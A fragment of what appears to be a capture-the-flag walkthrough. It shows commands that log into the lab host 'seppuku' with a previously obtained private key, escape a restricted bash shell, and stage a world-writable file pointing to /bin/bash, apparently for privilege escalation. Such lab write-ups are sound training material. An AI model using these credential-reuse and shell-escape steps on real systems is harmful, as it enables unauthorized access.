# tanto has id_rsa.pub and authorized_keys under /home/tanto/.ssh/
# the private key we have from earlier could be used
# again rbash
$ ssh -i private.key tanto@192.168.131.90 -t "bash --noprofile"
tanto@seppuku:~$ mkdir .cgi_bin; cd .cgi_bin
tanto@seppuku:~/.cgi_bin$ echo "/bin/bash" > bin
tanto@seppuku:~/.cgi_bin$ chmod 777 bin